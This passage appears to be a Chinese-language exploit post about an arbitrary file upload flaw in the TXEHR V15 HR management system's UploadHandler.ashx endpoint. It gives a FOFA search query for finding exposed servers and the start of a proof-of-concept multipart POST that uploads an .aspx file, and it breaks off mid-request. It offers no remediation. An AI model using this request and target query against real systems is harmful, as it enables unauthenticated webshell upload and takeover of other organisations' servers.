0x01 产品简介
同享人力资源管理系统(TXEHR V15)是一款专为现代企业设计的人力资源管理软件解决方案,旨在通过先进的信息化手段提升企业人力资源管理的效率与水平。该系统集成了组织人事、考勤管理、薪资核算、招聘配置、培训发展、绩效管理等核心模块,并提供了灵活的配置选项和强大的数据分析能力,以满足不同企业规模和行业特性的需求。
0x02 漏洞概述
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现环境
FOFA:body="/Assistant/Default.aspx"
0x04 漏洞复现
PoC
POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1
Host:
accept: */*
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
Connection: close
-----------------------------142851345723692939351758052805
Content-Disposition: form-data; name="Filedata"; filename="qwe.aspx"
Co